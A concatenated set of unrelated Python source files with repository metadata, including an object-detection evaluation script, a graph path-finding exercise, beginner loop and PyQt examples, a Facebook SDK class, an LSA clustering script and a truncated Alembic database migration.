heades.append(head[1:])
num_bbox = len(bboxes)
bboxes = np.array(bboxes)
heades = np.array(heades)
if num_bbox > 0:
if transform:
bboxes[:, 2:4] += (bboxes[:, :2] - 1)
heades[:, 2:4] += (heades[:, :2] - 1)
return {'im_name': im_name,
'num_bbox': num_bbox,
'bboxes': bboxes,
'heades': heades}
def compute_ap(recall, precision):
"""
Compute VOC AP given precision and recall.
"""
# first append sentinel values at the end
mrec = np.concatenate(([0.], recall, [1.]))
mpre = np.concatenate(([0.], precision, [0.]))
# compute the precision envelope
for i in range(mpre.size - 1, 0, -1):
mpre[i - 1] = np.maximum(mpre[i - 1], mpre[i])
# to calculate area under PR curve, look for points
# where X axis (recall) changes value
i = np.where(mrec[1:] != mrec[:-1])[0]
# and sum (\Delta recall) * prec
ap = np.sum((mrec[i + 1] - mrec[i]) * mpre[i + 1])
return ap
def get_points(x, y, target_x):
'''x should be sorted in ascending order'''
x1 = np.asarray(x)
y1 = np.asarray(y)
y0 = []
x2 = []
for x0 in target_x:
idx = np.where(x1 == x0)[0]
if idx.shape[0] > 0:
y0.append(y1[idx].mean())
x2.append(x0)
else:
idx = np.where(x1 > x0)[0]
if idx.shape[0] > 0:
w1 = x1[idx[0]] - x0
w2 = x0 - x1[idx[0] - 1]
w = w1 + w2
y0.append((y1[idx[0]] * w2 + y1[idx[0] - 1] * w1) / w)
x2.append(x0)
else:
y0.append(y1[-1])
x2.append(x1[-1])
return x2, y0
def getName2Box():
name2box = {}
fValDetail = open('data/psdbCrop/val1_detail.txt', 'r')
for line in fValDetail:
line = line.strip().split()
imagename = line[0]
bbox = map(float, line[1:])
name2box[imagename] = bbox
return name2box
def getName2Det(cache_file):
name2box = getName2Box()
if os.path.exists(cache_file):
with open(cache_file, 'rb') as fid:
detAll = np.array(cPickle.load(fid))
psdbCrop = get_imdb('psdbCrop_2015_val1')
name2det = {}
for i, imagename in enumerate(psdbCrop.image_index):
imagename = imagename.strip()
bbox = name2box[imagename]
det = detAll[1, i]
det[:, 0] += bbox[0]
det[:, 2] += bbox[0]
det[:, 1] += bbox[1]
det[:, 3] += bbox[1]
# det[:, 4] *= bbox[4]
imagename = imagename.split('_')[1] + '.jpg'
if imagename in name2det:
name2det[imagename] = np.vstack((
name2det[imagename], det))
else:
name2det[imagename] = det
for imagename in name2det:
sort_idx = np.argsort(name2det[imagename][:, 4])[::-1]
name2det[imagename] = name2det[imagename][sort_idx]
return name2det
def eval_roc_pr(config, gt_file, det_file, cls):
name2det = getName2Det(det_file)
psdbFourParts = get_imdb('psdbFourParts_2015_test')
psdbFourPartsLen = len(psdbFourParts.image_index)
default_iou_thresh = config.iou_thresh
min_width = config.min_width
min_height = config.min_height
eval_type = config.eval_type
assert os.path.exists(gt_file)
det_conf = []
det_tp = []
det_fp = []
pos_count = 0
bbox_count = 0
im_count = 0
detId = 0
with open(gt_file, 'r') as fgt:
for gtId in xrange(psdbFourPartsLen):
gt = read_bboxes(fgt, cls, transform=config.transform_gt)
imagename = gt['im_name'].strip()
if imagename in name2det:
det = name2det[imagename]
else:
det = np.zeros((0, 5))
num_gt = gt['num_bbox']
iou_thresh = [default_iou_thresh] * num_gt
gt_hit_mask = [False] * num_gt
if num_gt > 0:
mask_pos = [True] * num_gt
num_pos = len(np.where(mask_pos &
(gt['heades'][:, 2] - gt['heades'][:, 0] >= min_width) &
(gt['heades'][:, 3] - gt['heades'][:, 1] >= min_height))[0])
else:
num_pos = 0
pos_count += num_pos
bbox_count += num_gt
num_det = det.shape[0]
if num_det > 0:
det_conf.append(det[:, 4])
det_tp.append(np.zeros(num_det))
det_fp.append(np.zeros(num_det))
fp_box = []
fp_box_iou = []
for i in xrange(num_det):
max_iou = -np.inf
max_idx = -1
det_bbox = det[i, :4]
iou = 0
for j in xrange(num_gt):
if gt_hit_mask[j] or not mask_pos[j]:
continue
gt_bbox = gt['heades'][j, :4]
'''
im = cv2.imread(os.path.join(
'data', 'psdb', 'image', gt['im_name']))
# im = im [det_bbox[1]:det_bbox[3], det_bbox[0]:det_bbox[2]]
im = im [gt_bbox[1]:gt_bbox[3], gt_bbox[0]:gt_bbox[2]]
cv2.imshow('x', im)
cv2.waitKey()
'''
x1 = max(det_bbox[0], gt_bbox[0])
y1 = max(det_bbox[1], gt_bbox[1])
x2 = min(det_bbox[2], gt_bbox[2])
y2 = min(det_bbox[3], gt_bbox[3])
w = x2 - x1 + 1
h = y2 - y1 + 1
if w > 0 and h > 0:
s1 = (det_bbox[2] - det_bbox[0] + 1) * (det_bbox[3] - det_bbox[1] + 1)
s2 = (gt_bbox[2] - gt_bbox[0] + 1) * (gt_bbox[3] - gt_bbox[1] + 1)
s3 = w * h
iou = s3 / (s1 + s2 - s3)
if iou > iou_thresh[j] and iou > max_iou:
max_iou = iou
max_idx = j
if max_idx >= 0:
det_tp[im_count][i] = 1
gt_hit_mask[max_idx] = True
else:
det_fp[im_count][i] = 1
fp_box.append(det[i, :])
fp_box_iou.append(iou)
if num_det>0:
im_count = im_count + 1
det_conf = np.hstack(det_conf)
det_tp = np.hstack(det_tp)
det_fp = np.hstack(det_fp)
sort_idx = np.argsort(det_conf)[::-1]
det_tp = np.cumsum(det_tp[sort_idx])
det_fp = np.cumsum(det_fp[sort_idx])
keep_idx = np.where((det_tp > 0) | (det_fp > 0))[0]
det_tp = det_tp[keep_idx]
det_fp = det_fp[keep_idx]
recall = det_tp / pos_count
precision = det_tp / (det_tp + det_fp)
fppi = det_fp / im_count
print('fppi = 0.1')
myIdx = np.sum(fppi<=0.1)
print('myIdx', myIdx)
print('fppi[myIdx]', fppi[myIdx])
print('det_conf[myIdx]', det_conf[myIdx])
'''
print('')
print('fppi = 1')
myIdx = np.sum(fppi<=1)
print('myIdx', myIdx)
print('fppi[myIdx]', fppi[myIdx])
print('det_conf[myIdx]', det_conf[myIdx])
print('')
'''
ap = compute_ap(recall, precision)
fppi_pts, recall_pts = get_points(fppi, recall, [0.1])
stat_str = 'AP = {:f}\n'.format(ap)
for i, p in enumerate(fppi_pts):
stat_str += 'Recall = {:f}, Miss Rate = {:f} @ FPPI = {:s}'.format(recall_pts[i], 1 - recall_pts[i], str(p))
print stat_str
return {'fppi': fppi, 'recall': recall, 'precision': precision, 'ap': ap,
'recall_pts': recall_pts, 'fppi_pts': fppi_pts}
def plot_roc(data, id):
plt.figure()
for i, r in enumerate(data):
plt.plot(r['fppi'], r['recall'], label=id[i], linewidth=2.0)
plt.draw()
ax = plt.gca()
ax.set_ylim([0, 1])
ax.set_xscale('log')
plt.xlabel('FPPI', fontsize=16)
plt.ylabel('Recall', fontsize=16)
plt.legend(loc='upper left', fontsize=10)
plt.title('ROC Curve')
plt.grid(b=True, which='major', color='b', linestyle='-')
plt.grid(b=True, which='minor', color='b', linestyle=':')
def plot_pr(data, id):
plt.figure()
for i, r in enumerate(data):
plt.plot(r['recall'], r['precision'], label=id[i], linewidth=2.0)
plt.draw()
ax = plt.gca()
ax.set_xlim([0, 1])
ax.set_ylim([0, 1])
plt.xlabel('Recall', fontsize=16)
plt.ylabel('Precision', fontsize=16)
plt.legend(loc='lower left', fontsize=10)
plt.title('PR Curve')
plt.grid(b=True, which='major', color='b', linestyle='-')
plt.grid(b=True, which='minor', color='b', linestyle=':')
plt.minorticks_on()
def plot_curves(eval_result, curve_id):
plot_roc(eval_result, curve_id)
# plot_pr(eval_result, curve_id)
plt.savefig('psdbCropVal1.png')
if __name__ == '__main__':
config = EvalConfig()
config.iou_thresh = 0.5
config.min_width = 0
config.min_height = 0
config.eval_type = [0, 1, 2, 3, 4, 5]
config.transform_gt = True
config.transform_det = False
gt_file = 'data/psdb/phsb_rect_byimage_test.txt'
for i in range(10, 9, -1):
print("Iteration", i)
cacheFilename = \
'output/pvanet_full1_ohem_DRoiAlignX/psdbCrop_val1/zf_faster_rcnn_iter_' + str(i) + \
'0000_inference/detections.pkl'
if (os.path.exists(cacheFilename)):
eval_result = []
for cls in range(1, 2):
result = eval_roc_pr(config, gt_file, cacheFilename, cls)
eval_result.append(result)
det_id = ['head']
plot_curves(eval_result, det_id)
det_file = os.path.join('psdbCrop-psdbFourParts-fppi1-Ohem-pvanet-DRoiAlignX-' + str(i) +'.pkl')
with open(det_file, 'wb') as f:
cPickle.dump(eval_result, f, cPickle.HIGHEST_PROTOCOL)
| [
"[email protected]"
]
| |
630bdd5c13f4ec241b016ee6636bfe70af9b1448 | 01822d2ae38a95edcd188a51c377bb07b0a0c57d | /Assignments/Sprint3/FindAllPaths.py | faf38a0af57c11891b1ec51c5c26b3865f784c23 | [
"MIT"
]
| permissive | mark-morelos/CS_Notes | bc298137971295023e5e3caf964fe7d3f8cf1af9 | 339c47ae5d7e678b7ac98d6d78857d016c611e38 | refs/heads/main | 2023-03-10T11:56:52.691282 | 2021-03-02T15:09:31 | 2021-03-02T15:09:31 | 338,211,631 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,496 | py | """
Understand
Note: For some reason, it's failing one of the tests. I
think it's because the test case didn't sort their output.
In that case, the test is wrong :)
Drawing graphs via text are a pain, so I'm just gonna use the example given
Plan
1. Translate the problem into graph terminology
- Each index in the list given is a node
- Each subarray are the node's outgoing edges to its neighbors
2. Build your graph
- The graph is actually already built for us. We can traverse
the given list like a graph since
we have access to the node we're at and its neighbors.
3. Traverse the graph
- Any type of traversal would work, we just need to keep
track of the path that we've currently taken
- We add that path to the result once we reach the destination node
- Note that we don't need a visited set since we're
guaranteed that the graph is a DAG
Runtime: O(number of nodes^2)
Space: O(number of nodes^2)
Imagine a dense graph
"""
from collections import deque
def csFindAllPathsFromAToB(graph):
stack = deque()
stack.append((0, [0]))
res = []
destinationNode = len(graph) - 1
while len(stack) > 0:
curr = stack.pop()
currNode, currPath = curr[0], curr[1]
for neighbor in graph[currNode]:
newPath = currPath.copy()
newPath.append(neighbor)
if neighbor == destinationNode:
res.append(newPath)
else:
stack.append((neighbor, newPath))
res.sort()
return res | [
"[email protected]"
]
| |
d99058ae8efde20b0b9a94917310bf9294bf3d79 | 3d4094d6eca69329d4c6ba08e0c8ce79eedeb6b6 | /starter/While.py | af86daef2ae3d6572815e944274601b1454dd277 | []
| no_license | agkozik/Python_Course | c9f3c8b68e60b452e57f43da7554c13daf386a0c | 4b095bbc86f33999efe95127528b3e1d8bfded9f | refs/heads/master | 2022-04-27T06:04:15.276472 | 2020-04-22T11:49:06 | 2020-04-22T11:49:06 | 255,082,012 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,286 | py | # # ---------------------- while true ----------------------------
#
# message = ""
# while message != "exit":
# message = input("Type exit to exit: ")
#
# # ---------------------- while int true ----------------------------
# n = 1
# while n <= 3:
# print("n = ", n)
# n += 1
#
# # ---------------------- while enter a positive number --------
# number = 0
# while number <= 0:
# number = int(input("Enter a positive number: "))
# print("Your number is ", number)
# # ---------------------- Break --------------------------------
# i = 1
# while True:
# print("Iterataion ", i)
# i += 1
# if i == 10:
# break
# print("Loop has stopped")
# # ---------------------- Continue -----------------------------
# n = 0
# while n < 10:
# n += 1;
# if n == 5:
# print("Value 5 skipped because of continue operator")
# continue
# print(n)
# # ---------------------- While with Else ----------------------------
attempts_left = 3
while attempts_left > 0:
attempts_left -= 1
password = input("Please, enter Password ["
"you have {} attempt(s) ]: ".format(attempts_left + 1))
if password == '1234':
print("Correct password, signing...")
break
else:
print("You lost all attempts.")
| [
"[email protected]"
]
| |
6c7d9885d0519d18a161ee398e1f83753b821006 | 65a32b8a8a97c126843d2cfe79c43193ac2abc23 | /chapter9/local_var.py | 1816492d4b38b735cc5262f0aabbb32c1c380b9e | []
| no_license | zhuyuedlut/advanced_programming | 9af2d6144e247168e492ddfb9af5d4a5667227c4 | a6e0456dd0b216b96829b5c3cef11df706525867 | refs/heads/master | 2023-03-19T09:21:31.234000 | 2020-10-09T13:09:38 | 2020-10-09T13:09:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 809 | py | a = 20
exec('b = a + 1')
print(f'b = {b}')
# def test():
# a = 20
# exec('b = a + 1')
# print(f'b = {b}')
#
# test()
def test():
a = 20
loc = locals()
exec('b = a + 1')
b = loc['b']
print(f't: b = {b}')
test()
def test_1():
x = 0
exec('x += 1')
print(f't1: x = {x}')
test_1()
def test_2():
x = 0
loc = locals()
print(f't2 before: {loc}')
exec('x += 1')
print(f't2 after: {loc}')
print(f't2: x = {x}')
test_2()
def test_3():
x = 0
loc = locals()
print(f't3: loc = {loc}')
exec('x += 1')
print(f't3: loc = {loc}')
locals()
print(f't3: loc = {loc}')
test_3()
def test_4():
a = 20
loc = {'a': a}
glb = {}
exec('b = a + 1', glb, loc)
b = loc['b']
print(f't4: b = {b}')
test_4() | [
"[email protected]"
]
| |
0512aa9369f8d18ed59f628853a123ff95d586bc | 74912c10f66e90195bf87fd71e9a78fa09f017ec | /execroot/syntaxnet/bazel-out/local-opt/bin/dragnn/python/graph_builder_test.runfiles/org_tensorflow/tensorflow/contrib/learn/python/learn/tests/dataframe/__init__.py | 31d718df713532da6c36386b67220f0d1e6e878f | []
| no_license | koorukuroo/821bda42e7dedbfae9d936785dd2d125- | 1f0b8f496da8380c6e811ed294dc39a357a5a8b8 | 237fcc152ff436f32b2b5a3752a4181d279b3a57 | refs/heads/master | 2020-03-17T03:39:31.972750 | 2018-05-13T14:35:24 | 2018-05-13T14:35:24 | 133,244,956 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 153 | py | /root/.cache/bazel/_bazel_root/821bda42e7dedbfae9d936785dd2d125/external/org_tensorflow/tensorflow/contrib/learn/python/learn/tests/dataframe/__init__.py | [
"k"
]
| k |
46bb827c374c723df2920b4765f45cafad5d8454 | 50402cc4388dfee3a9dbe9e121ef217759ebdba8 | /demo/testPyQt/test3.py | 6c42882d89fc51c0eae08cdf2e7c23b542794f04 | []
| no_license | dqyi11/SVNBackup | bd46a69ec55e3a4f981a9bca4c8340944d8d5886 | 9ad38e38453ef8539011cf4d9a9c0a363e668759 | refs/heads/master | 2020-03-26T12:15:01.155873 | 2015-12-10T01:11:36 | 2015-12-10T01:11:36 | 144,883,382 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 928 | py | '''
Created on Apr 22, 2014
@author: walter
'''
import sys
from PyQt4 import QtGui
class Example(QtGui.QMainWindow):
def __init__(self):
super(Example, self).__init__()
self.initUI()
def initUI(self):
exitAction = QtGui.QAction(QtGui.QIcon('exit.png'), '&Exit', self)
exitAction.setShortcut('Ctrl+Q')
exitAction.setStatusTip('Exit application')
exitAction.triggered.connect(QtGui.qApp.quit)
self.statusBar()
menubar = self.menuBar()
fileMenu = menubar.addMenu('&File')
fileMenu.addAction(exitAction)
self.setGeometry(300, 300, 300, 200)
self.setWindowTitle('Menubar')
self.show()
def main():
app = QtGui.QApplication(sys.argv)
ex = Example()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
| [
"walter@e224401c-0ce2-47f2-81f6-2da1fe30fd39"
]
| walter@e224401c-0ce2-47f2-81f6-2da1fe30fd39 |
c9ca634b1cfd0a70676f197430bc0680ce1077d0 | 8928c4745515ffecfc581da36df47b0789fb463f | /Chapter_9/formsub.py | 51ea5e0fe04bad40167a6fc40016825b997f0e1d | []
| no_license | iluxonchik/webscraping-with-python-book | 72da36ba8fae016ccc20d44753ec4c46bc933dee | ffc5a1459778649d081c62812c8d3edbb2f120a9 | refs/heads/master | 2021-01-10T10:19:12.443341 | 2016-01-21T21:50:11 | 2016-01-21T21:50:11 | 48,058,040 | 1 | 3 | null | null | null | null | UTF-8 | Python | false | false | 302 | py | import requests
params = {'firstname':'hello', 'lastname':'there'}
r = requests.post("http://pythonscraping.com/files/processing.php", data=params)
print(r.text)
files = {'uploadFile': open('1.png', 'rb')}
r = requests.post("http://pythonscraping.com/files/processing2.php", files=files)
print(r.text) | [
"[email protected]"
]
| |
e7df1ffbd062f8f616fff956e0482311a709c86a | e4d4149a717d08979953983fa78fea46df63d13d | /Week6/Day5/DailyChallenge.py | 68788690cf6a298238eff2f8a5648c48d64c3f7a | []
| no_license | fayblash/DI_Bootcamp | 72fd75497a2484d19c779775c49e4306e602d10f | a4e8f62e338df5d5671fd088afa575ea2e290837 | refs/heads/main | 2023-05-05T20:55:31.513558 | 2021-05-27T06:48:40 | 2021-05-27T06:48:40 | 354,818,813 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 615 | py | import sqlite3 as sl
from time import time
import requests
import json
connection=sl.connect("countries.db")
cursor=connection.cursor()
start=time()
for i in range(10,21):
data=requests.get("https://restcountries.eu/rest/v2/all")
country=data.json()
print (country[i]['name'])
query=f"INSERT INTO countries(name,capital,flag,subregion,population) VALUES ('{country[i]['name']}','{country[i]['capital']}','{country[i]['flag']}','{country[i]['subregion']}','{country[i]['population']}')"
cursor.execute(query)
connection.commit()
connection.close()
end=time()
print(end-start)
| [
"[email protected]"
]
| |
277ca5faf223fee0254b99c950487e402e63cb75 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_untruth.py | f82b360189c64e1e50c3124e3fe683bea2162f45 | [
"MIT"
]
| permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 354 | py |
#calss header
class _UNTRUTH():
def __init__(self,):
self.name = "UNTRUTH"
self.definitions = [u'a statement that is not true: ', u'the fact that something is not true: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
| [
"[email protected]"
]
| |
97698fdcf4861c65a25ec9893aa57e5b52a06063 | b6b2be9866fd16699ad5c30a21bbcb70755f1e57 | /Experiments/_Legacy/Chicago/PartitionByDocThenClusterUsingLsa.py | 6e174934f81ca58b1b992fbc3c3f4391ac23815f | []
| no_license | simonhughes22/PythonNlpResearch | 24a482c7036c568b063ec099176b393d45a0a86b | 2bc2914ce93fcef6dbd26f8097eec20b7d0e476d | refs/heads/master | 2022-12-08T17:39:18.332177 | 2019-10-26T12:48:33 | 2019-10-26T12:48:33 | 16,458,105 | 17 | 7 | null | 2022-12-07T23:38:17 | 2014-02-02T16:36:39 | Jupyter Notebook | UTF-8 | Python | false | false | 4,135 | py | import Clusterer
import ClustersToFile
import SentenceData
import ListHelper
import Lsa
import MatrixHelper
import TfIdf
import WordTokenizer
import logging
import PartitionByCode
import CosineSimilarity
import collections
def find_closest_document(txtMatrixByCode, row):
""" Takes a dictionary of codes to LSA matrices (one per document)
and returns the key for the closest doc based on the mean
cosine similarity (could also use max...)
"""
if len(row) == 0:
return "ERROR"
means_per_code = {}
for doc in txtMatrixByCode.keys():
distance_matrix = txtMatrixByCode[doc]
total = 0.0
for row_to_test in distance_matrix:
sim = CosineSimilarity.cosine_similarity(row, row_to_test)
total += sim
means_per_code[doc] = total / len(distance_matrix)
# first row, first tuple (key)
return sorted(means_per_code.items(), key = lambda item: item[1], reverse = True)[0][0]
def train(num_lsa_topics, k):
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
#TOKENIZE
xs = SentenceData.SentenceData()
tokenizer = WordTokenizer.WordTokenizer(min_word_count = 5)
tokenized_docs = tokenizer.tokenize(xs.documents)
#MAP TO VECTOR AND SEMANTIC SPACE
tfidf = TfIdf.TfIdf(tokenized_docs)
lsa = Lsa.Lsa(tfidf, num_topics = num_lsa_topics)
full_lsa_matrix = MatrixHelper.gensim_to_python_mdarray(lsa.distance_matrix, num_lsa_topics)
#TODO Partition into Docs by LSA sim
txt_codes = xs.text_codes
clusters_per_text_code = int(round( k/ float((len(txt_codes)))))
#Extract the sm code rows from LSA
smCodeRows = ListHelper.filter_list_by_index(full_lsa_matrix, xs.sm_code_indices)
smCodeClassifications = ListHelper.filter_list_by_index(xs.codes_per_document, xs.sm_code_indices)
smCodeCategoryClassifications = ListHelper.filter_list_by_index(xs.categories_per_document, xs.sm_code_indices)
# Dict of <code, list[list]]> - LSA row vectors
logging.info("Partitioning LSA distance_matrix by Source Document")
txtMatrixByCode = PartitionByCode.partition(full_lsa_matrix, xs, xs.text_codes)
closest_docs = [find_closest_document(txtMatrixByCode, row) for row in smCodeRows]
matrix_by_doc = collections.defaultdict(list)
for i, doc in enumerate(closest_docs):
matrix_by_doc[doc].append(smCodeRows[i])
#Stores all cluster labels
logging.info("Clustering within a document")
all_smcode_labels = []
label_offset = 0
for doc in xs.text_codes:
distance_matrix = matrix_by_doc[doc]
#CLUSTER
clusterer = Clusterer.Clusterer(clusters_per_text_code)
labels = clusterer.Run(distance_matrix)
all_smcode_labels = all_smcode_labels + [int(l + label_offset) for l in labels]
label_offset += clusters_per_text_code
#OUTPUT
file_name_code_clusters = "Partition_By_Doc_LSA_SMCODES_k-means_k_{0}_dims_{1}.csv".format(k, num_lsa_topics)
ClustersToFile.clusters_to_file(file_name_code_clusters, all_smcode_labels, smCodeClassifications, "Chicago")
file_name_category_clusters = "Partition_By_Doc_LSA_categories_k-means_k_{0}_dims_{1}.csv".format(k, num_lsa_topics)
ClustersToFile.clusters_to_file(file_name_category_clusters, all_smcode_labels, smCodeCategoryClassifications, "Chicago")
#TODO - filter the category and the docs per docs to the sm codes and output
#file_name_category_clusters = "Partition_By_Doc_LSA_categories_k-means_k_{0}_dims_{1}.txt".format(k, num_lsa_topics)
#ClustersToFile.clusters_to_file(file_name_category_clusters, all_smcode_labels, smCodeClassifications, "Chicago")
print "Finished processing lsa clustering for dims: {0} and k: {1}".format(num_lsa_topics, k)
if __name__ == "__main__":
#k = cluster size
#for k in range(40,41,1): #start, end, increment size
# train(300, k)
train(num_lsa_topics = 300, k = 30) | [
"[email protected]"
]
| |
2408590522753e9cd86637c0677554589f285d76 | c9d4d4c78703d009da11999e4e59b6a168a454a2 | /examples/Learning Python The Hard Way/ex11_AskingQuestions.py | be33a059dc6c1cfcccb68bbc63af5f196c02ccc2 | [
"MIT"
]
| permissive | AkiraKane/Python | 23df49d7f7ae0f375e0b4ccfe4e1b6a077b1a52b | 12e2dcb9a61e9ab0fc5706e4a902c48e6aeada30 | refs/heads/master | 2020-12-11T07:20:01.524438 | 2015-11-07T12:42:22 | 2015-11-07T12:42:22 | 47,440,128 | 1 | 0 | null | 2015-12-05T03:15:52 | 2015-12-05T03:15:51 | null | UTF-8 | Python | false | false | 335 | py | '''
Created on 2013-8-14
@author: Kelly Chan
Python Version: V3.3
Book: Learn Python The Hard Way
Ex11: Asking Questions
'''
print("How old are you?")
age = input()
print("How tall are you?")
height = input()
print("How much do you weigh?")
weight = input()
print("So, you're %r old, %r tall and %r heavy." % (age, height, weight)) | [
"[email protected]"
]
| |
238ec91f069f7201b85bb750838f5ebd9b18ecd9 | ce083128fa87ca86c65059893aa8882d088461f5 | /python/pytest-labs/.venv/lib/python3.6/site-packages/facebook_business/adobjects/productdaeventsamplesbatch.py | 6155974b1405f7c8bc729960a751f6b815d8bc6d | []
| no_license | marcosptf/fedora | 581a446e7f81d8ae9a260eafb92814bc486ee077 | 359db63ff1fa79696b7bc803bcfa0042bff8ab44 | refs/heads/master | 2023-04-06T14:53:40.378260 | 2023-03-26T00:47:52 | 2023-03-26T00:47:52 | 26,059,824 | 6 | 5 | null | 2022-12-08T00:43:21 | 2014-11-01T18:48:56 | null | UTF-8 | Python | false | false | 2,489 | py | # Copyright 2014 Facebook, Inc.
# You are hereby granted a non-exclusive, worldwide, royalty-free license to
# use, copy, modify, and distribute this software in source code or binary
# form for use in connection with the web services and APIs provided by
# Facebook.
# As with any software that integrates with the Facebook platform, your use
# of this software is subject to the Facebook Developer Principles and
# Policies [http://developers.facebook.com/policy/]. This copyright notice
# shall be included in all copies or substantial portions of the software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
from facebook_business.adobjects.abstractobject import AbstractObject
"""
This class is auto-generated.
For any issues or feature requests related to this class, please let us know on
github and we'll fix in our codegen framework. We'll not be able to accept
pull request for this class.
"""
class ProductDaEventSamplesBatch(
AbstractObject,
):
def __init__(self, api=None):
super(ProductDaEventSamplesBatch, self).__init__()
self._isProductDaEventSamplesBatch = True
self._api = api
class Field(AbstractObject.Field):
samples = 'samples'
time_start = 'time_start'
time_stop = 'time_stop'
class AggregationType:
content_id = 'CONTENT_ID'
content_url = 'CONTENT_URL'
class Event:
viewcontent = 'ViewContent'
addtocart = 'AddToCart'
purchase = 'Purchase'
initiatecheckout = 'InitiateCheckout'
search = 'Search'
lead = 'Lead'
addtowishlist = 'AddToWishlist'
_field_types = {
'samples': 'list<Object>',
'time_start': 'unsigned int',
'time_stop': 'unsigned int',
}
@classmethod
def _get_field_enum_info(cls):
field_enum_info = {}
field_enum_info['AggregationType'] = ProductDaEventSamplesBatch.AggregationType.__dict__.values()
field_enum_info['Event'] = ProductDaEventSamplesBatch.Event.__dict__.values()
return field_enum_info
| [
"[email protected]"
]
| |
4637ad8e57ec88e45fda29f4a08e4b0144d0f669 | f0e11aeb7b5bd96c828cf39728eb2fa523f320df | /snapflow/migrations/versions/7d5638b5d74d_initial_migration.py | 8b85094b11b08e55368d3320bb0b4bdb56eecc13 | [
"BSD-3-Clause"
]
| permissive | sathya-reddy-m/snapflow | 7bc1fa7de7fd93b81e5b0538ba73ca68e9e109db | 9e9e73f0d5a3d6b92f528ef1e2840ad92582502e | refs/heads/master | 2023-05-01T05:14:08.479073 | 2021-05-21T00:14:56 | 2021-05-21T00:14:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,528 | py | """Initial migration
Revision ID: 7d5638b5d74d
Revises:
Create Date: 2021-05-17 20:55:42.613348
"""
import snapflow
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = "7d5638b5d74d"
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table(
"_snapflow_data_block_metadata",
sa.Column("env_id", sa.String(length=64), nullable=True),
sa.Column("created_at", sa.DateTime(), nullable=True),
sa.Column("updated_at", sa.DateTime(), nullable=True),
sa.Column("id", sa.String(length=128), nullable=False),
sa.Column("inferred_schema_key", sa.String(length=128), nullable=True),
sa.Column("nominal_schema_key", sa.String(length=128), nullable=True),
sa.Column("realized_schema_key", sa.String(length=128), nullable=False),
sa.Column("record_count", sa.Integer(), nullable=True),
sa.Column("created_by_node_key", sa.String(length=128), nullable=True),
sa.Column("deleted", sa.Boolean(), nullable=True),
sa.PrimaryKeyConstraint("id"),
)
op.create_table(
"_snapflow_data_function_log",
sa.Column("env_id", sa.String(length=64), nullable=True),
sa.Column("created_at", sa.DateTime(), nullable=True),
sa.Column("updated_at", sa.DateTime(), nullable=True),
sa.Column("id", sa.Integer(), autoincrement=True, nullable=False),
sa.Column("node_key", sa.String(length=128), nullable=False),
sa.Column("node_start_state", sa.JSON(), nullable=True),
sa.Column("node_end_state", sa.JSON(), nullable=True),
sa.Column("function_key", sa.String(length=128), nullable=False),
sa.Column("function_params", sa.JSON(), nullable=True),
sa.Column("runtime_url", sa.String(length=128), nullable=True),
sa.Column("queued_at", sa.DateTime(), nullable=True),
sa.Column("started_at", sa.DateTime(), nullable=True),
sa.Column("completed_at", sa.DateTime(), nullable=True),
sa.Column("error", sa.JSON(), nullable=True),
sa.PrimaryKeyConstraint("id"),
)
op.create_table(
"_snapflow_generated_schema",
sa.Column("env_id", sa.String(length=64), nullable=True),
sa.Column("created_at", sa.DateTime(), nullable=True),
sa.Column("updated_at", sa.DateTime(), nullable=True),
sa.Column("key", sa.String(length=128), nullable=False),
sa.Column("definition", sa.JSON(), nullable=True),
sa.PrimaryKeyConstraint("key"),
)
op.create_table(
"_snapflow_node_state",
sa.Column("env_id", sa.String(length=64), nullable=True),
sa.Column("created_at", sa.DateTime(), nullable=True),
sa.Column("updated_at", sa.DateTime(), nullable=True),
sa.Column("id", sa.Integer(), autoincrement=True, nullable=False),
sa.Column("node_key", sa.String(length=128), nullable=True),
sa.Column("state", sa.JSON(), nullable=True),
sa.PrimaryKeyConstraint("id"),
sa.UniqueConstraint("env_id", "node_key"),
)
op.create_table(
"_snapflow_data_block_log",
sa.Column("env_id", sa.String(length=64), nullable=True),
sa.Column("created_at", sa.DateTime(), nullable=True),
sa.Column("updated_at", sa.DateTime(), nullable=True),
sa.Column("id", sa.Integer(), autoincrement=True, nullable=False),
sa.Column("function_log_id", sa.Integer(), nullable=False),
sa.Column("data_block_id", sa.String(length=128), nullable=False),
sa.Column("stream_name", sa.String(length=128), nullable=True),
sa.Column(
"direction",
sa.Enum("INPUT", "OUTPUT", name="direction", native_enum=False),
nullable=False,
),
sa.Column("processed_at", sa.DateTime(), nullable=False),
sa.Column("invalidated", sa.Boolean(), nullable=True),
sa.ForeignKeyConstraint(
["data_block_id"],
["_snapflow_data_block_metadata.id"],
),
sa.ForeignKeyConstraint(
["function_log_id"],
["_snapflow_data_function_log.id"],
),
sa.PrimaryKeyConstraint("id"),
)
op.create_table(
"_snapflow_stored_data_block_metadata",
